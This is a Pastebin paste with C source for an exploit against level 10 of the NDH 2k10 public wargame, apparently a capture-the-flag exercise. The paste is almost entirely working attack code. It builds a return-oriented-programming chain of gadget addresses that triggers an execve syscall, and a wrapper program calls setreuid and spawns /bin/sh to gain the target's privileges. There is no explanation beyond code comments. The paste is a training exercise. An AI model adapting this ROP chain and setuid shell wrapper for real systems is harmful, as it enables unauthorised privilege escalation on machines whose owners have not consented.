Advertisement
raisep0wn

NDH 2k10 public wargame, level10, exploit

May 28th, 2011
324
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.04 KB | None | 0 0
  1. /***********************************
  2. |   Exploit.c                      |
  3. ***********************************/
  4. #include <stdio.h>
  5. #include <stdlib.h>
  6. #include <unistd.h>
  7. #include <string.h>
  8.  
  9. //Target program
  10. char target_path[] = "/home/level10/level10";
  11. char *env[] = {"/tmp/wrapper", (char *)0};
  12.  
  13. int main(int argc, char *argv[])
  14. {
  15.  char arg[89]; //Argument
  16.  char ebx[5];  //Ebx in little-endian string
  17.  
  18.  //Getting shellcode address in environment varibale array
  19.  unsigned int shaddr = 0xbffffffc - (strlen(target_path)+1 + strlen(env[0])+1);
  20.  
  21.  //Convert @shellcode into little-endian
  22.  snprintf(ebx, 5, "%c%c%c%c", (char)shaddr&0x000000FF, (char)(shaddr >> 8)&0x000000FF, (char)(shaddr >> 16)&0x000000FF, (char)(shaddr >> 24)&0x000000FF);
  23.  
  24.  //ROP chain
  25.  snprintf(arg, 89,
  26.  "------------" //garbage
  27.  "\x41\x23\x05\x08" //pop edx ; pop ecx ; pop ebx ;;
  28.  "\xff\xff\xff\xff" //edx
  29.  "\xff\xff\xff\xff" //ecx
  30.  "%s"               //ebx
  31.  "\xe9\xec\x04\x08" //inc edx ; add al 0x83 ;;
  32.  "\xa6\x53\x08\x08" //inc ecx ; adc al 0x39 ;;
  33.  "\x5c\x82\x04\x08" //xor eax eax ; inc eax ;;  eax=0x1
  34.  "\x5e\x82\x04\x08" //inc eax ;;            eax=0x2
  35.  "\x5e\x82\x04\x08" //inc eax ;;            eax=0x3
  36.  "\x5e\x82\x04\x08" //inc eax ;;            eax=0x4
  37.  "\x5e\x82\x04\x08" //inc eax ;;            eax=0x5
  38.  "\x5e\x82\x04\x08" //inc eax ;;            eax=0x6
  39.  "\x5e\x82\x04\x08" //inc eax ;;            eax=0x7
  40.  "\x5e\x82\x04\x08" //inc eax ;;            eax=0x8
  41.  "\x5e\x82\x04\x08" //inc eax ;;            eax=0x9
  42.  "\x5e\x82\x04\x08" //inc eax ;;            eax=0xa
  43.  "\x5e\x82\x04\x08" //inc eax ;;            eax=0xb
  44.  "\x60\x82\x04\x08" //int 0x80 ; pop ebp ;;
  45.  "\xf0\xff\xff\xbf" //ebp (dont care)
  46.  , ebx);
  47.  
  48.  //Exploit
  49.  if(!execle(target_path, target_path, arg, (char *)0, env))
  50.  {
  51.   perror("Unable to execute the target.\n");
  52.   exit(1);
  53.  }
  54.  return 0;
  55. }
  56.  
  57. /***********************************
  58. |   Wrapper.c                      |
  59. ***********************************/
  60. #include <stdio.h>
  61. #include <stdlib.h>
  62. #include <unistd.h>
  63.  
  64. int main(int argc, char* argv[])
  65. {
  66.  int euid = geteuid();
  67.  setreuid(euid, euid);
  68.  execv("/bin/sh", (char *)0);
  69. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement